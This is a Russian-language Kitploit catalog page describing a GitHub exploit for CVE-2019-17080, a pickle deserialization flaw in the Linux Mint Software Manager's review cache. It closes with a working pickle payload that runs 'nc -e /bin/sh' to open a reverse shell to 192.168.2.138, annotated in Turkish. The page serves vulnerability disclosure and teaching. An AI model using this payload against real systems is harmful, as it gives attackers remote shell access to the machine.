Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Mintinstall-object-injection — CVE-2019-17080 | Kitploit
Инструменты/GitHubGitHub/materaj2/mintinstall-object-injection
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийCTFОбучение и ОбразованиеЭксплуатация Бинарных Файлов
GitHubmateraj2/mintinstall-object-injection

Mintinstall-object-injection

CVE-2019-17080

Репозиторий
26 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Диспетчер программ Linux Mint (v 7.9.5/9) из-за неправильной конфигурации позволяет выполнить внедрение объектов и произвольный код.

root@kitploit:~
mintinsall

Когда мы запускаем диспетчер программ Mint, он проверяет, есть ли новый комментарий; если есть новый комментарий, он загружает его по адресу new-reviews.list и записывает в файл.

root@kitploit:~
code mintinstall.py

Когда диспетчер программ запускается впервые, он вызывает класс ReviewCache() из модуля reviews.

Как обрабатываются данные?

Как он обрабатывает данные?

root@kitploit:~
code reviews.py

Когда класс ReviewCache запускается (init), он вызывает функцию _load_cache().

Функция Load cache читает файл, находящийся в переменной REVIEWS_CACHE, и с помощью модуля pickle десериализует данные из файла и сохраняет некоторые значения в памяти.

Скачать инструмент

Когда я проверил файл, оказалось, что у меня есть разрешение на запись.

Поскольку с помощью модуля Pickle мы можем выполнять операции сериализации/десериализации, мы можем подключить модуль и выполнить произвольный код, используя метод reduce.

В этом случае, если попытаться десериализовать файл, наш вредоносный код выполнится.

root@kitploit:~
cos 
system 
(S'nc -e /bin/sh 192.168.2.138 4545' 
tR.
>>modül adı c{os}
>> fonksiyon
( >> işaretleyici nesnesi 
S >> tırnak sonuna kadar okuyup stack'e at
tR. >> stackte olanları çagır ve sonucu stacke yerleştir.

alt-text